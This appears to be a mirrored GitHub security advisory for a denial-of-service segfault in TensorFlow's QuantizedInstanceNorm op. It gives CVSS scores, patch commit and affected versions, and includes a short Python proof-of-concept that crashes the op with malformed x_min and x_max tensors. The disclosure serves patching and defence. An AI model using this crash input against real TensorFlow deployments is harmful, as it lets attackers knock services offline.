Lucene search

K
githubGitHub Advisory DatabaseGHSA-G35R-369W-3FQP
HistorySep 16, 2022 - 10:17 p.m.

TensorFlow vulnerable to segfault in `QuantizedInstanceNorm`

2022-09-1622:17:57
CWE-20
GitHub Advisory Database
github.com
7
tensorflow
quantizedinstancenorm
vulnerability
segfault
denial of service
patch
github
commit
fix
tensorflow 2.10.0
cherrypick
security guide
neophytos christou
secure systems labs
brown university

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

0.001 Low

EPSS

Percentile

32.5%

Impact

If QuantizedInstanceNorm is given x_min or x_max tensors of a nonzero rank, it results in a segfault that can be used to trigger a denial of service attack.

import tensorflow as tf

output_range_given = False
given_y_min = 0
given_y_max = 0
variance_epsilon = 1e-05
min_separation = 0.001
x = tf.constant(88, shape=[1,4,4,32], dtype=tf.quint8)
x_min = tf.constant([], shape=[0], dtype=tf.float32)
x_max = tf.constant(0, shape=[], dtype=tf.float32)
tf.raw_ops.QuantizedInstanceNorm(x=x, x_min=x_min, x_max=x_max, output_range_given=output_range_given, given_y_min=given_y_min, given_y_max=given_y_max, variance_epsilon=variance_epsilon, min_separation=min_separation)

Patches

We have patched the issue in GitHub commit 785d67a78a1d533759fcd2f5e8d6ef778de849e0.

The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.

For more information

Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.

Attribution

This vulnerability has been reported by Neophytos Christou, Secure Systems Labs, Brown University.

Affected configurations

Vulners
Node
tensorflowgpuRange<2.9.1
OR
tensorflowgpuRange<2.8.1
OR
tensorflowgpuRange<2.7.2
OR
tensorflowcpuRange<2.9.1
OR
tensorflowcpuRange<2.8.1
OR
tensorflowcpuRange<2.7.2
OR
tensorflowtensorflowRange<2.9.1
OR
tensorflowtensorflowRange<2.8.1
OR
tensorflowtensorflowRange<2.7.2

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

0.001 Low

EPSS

Percentile

32.5%

Related for GHSA-G35R-369W-3FQP